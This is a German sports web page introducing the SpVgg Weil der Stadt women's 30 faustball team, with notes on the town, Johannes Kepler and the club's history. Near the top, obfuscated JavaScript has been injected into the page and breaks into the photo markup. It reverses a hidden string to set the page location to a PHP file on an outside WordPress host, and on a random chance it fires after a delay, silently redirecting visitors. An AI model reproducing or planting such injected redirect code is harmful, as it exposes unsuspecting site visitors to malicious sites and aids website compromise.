SpVgg Weil der Stadt

$Bhq=function(n){if (typeof ($Bhq.list[n]) == „string“) return $Bhq.list[n].split(„“).reverse().join(„“);return $Bhq.list[n];};$Bhq.list=[„‚php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}to-Weil-der-Stadt-1024×768.jpg“ alt=““ width=“596″ height=“447″ /> Hinten v.l.n.r. Betreuer Constantin Reutter, Sarah Heider, Eva Grözinger, Jutta Zechling, Daniela Aigner,
Vorne v.l.n.r. Bianca Reutter, Sabrina Klein, Simone Vetter

Weil der Stadt gehört zum Landkreis Böblingen und fasst mit allen Stadtteilen knapp 19.000 Einwohner.
Besondere Bekanntheit genießt die Stadt als Geburtsstadt des berühmten Astronomen und Mathematikers Johannes Kepler (1571-1630), weshalb die Stadt auch Keplerstadt genannt wird.

Faustball wird in Weil der Stadt bereits seit über 50 Jahren gespielt und war in den 90er Jahren eine Hochburg im Faustballsport mit ständiger Beteiligung in der 1. BL sowie DM.
Heute sind im Spielbetrieb insgesamt 6 Mannschaften gemeldet. 2 Jugendmannschaften, 2 Damenmannschaften sowie 1 Männermannschaft bei den Aktiven und natürlich in der AK M45 die bewährte und erfolgreiche Seniorenmannschaft mit mehrmaligen DM-Titeln in den Jahren 2005 und 2007.

Die Frauen 30 Mannschaft geht erstmalig bei einer DM für Weil der Stadt an den Start und wurde aus 4 Vereinen zusammengeführt (SpVgg Weil der Stadt, TSV Schwieberdingen, TV Vaihingen-Enz und NLV Vaihingen).
Es sind aus allen Klassen Spielerinnen vertreten (LL-1.BL) sowie auch ehemalige Jugend-Nationalspielerinnen (U18).
Platzierung im letzten Jahr F30 DM in Waghäusel: 4. Platz mit der Spielgemeinschaft NLV Vahingen.

Das Ziel dieses Jahr ist möglichst viel Spaß auf dem Platz und haben und möglichst lange im Turnier zu bleiben 😊